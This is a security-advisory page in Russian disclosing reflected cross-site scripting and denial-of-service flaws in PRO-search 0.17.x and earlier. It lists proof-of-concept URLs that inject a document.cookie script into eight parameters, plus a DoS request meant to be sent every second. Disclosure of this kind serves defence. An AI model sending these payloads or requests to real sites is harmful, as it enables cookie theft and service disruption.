logo
DATABASE RESOURCES PRICING ABOUT US

Vulnerabilities in PRO-search

Description

Здравствуйте 3APA3A! Сообщаю вам о найденной мною Cross-Site Scripting и Denial of Service уязвимостях в PRO-search. XSS: Уязвимости на главной странице в параметрах prot, host, path, name, ext, size, search_days, show_page. http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Denial of Service: http://site/?show_page=20000&time=0 Поисковик ищет по всем файлам, что может привести к DoS (чем больше значение show_page, тем большая задержка сервера). DoS кратковременный, поэтому для проведения DoS атаки нужно регулярно (ежесекундно) посылать запрос к серверу. Дополнительная информация о данных уязвимостях у меня на сайте: http://websecurity.com.ua/1259/ Уязвимы версии PRO-search 0.17.x и все предыдущие версии. Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua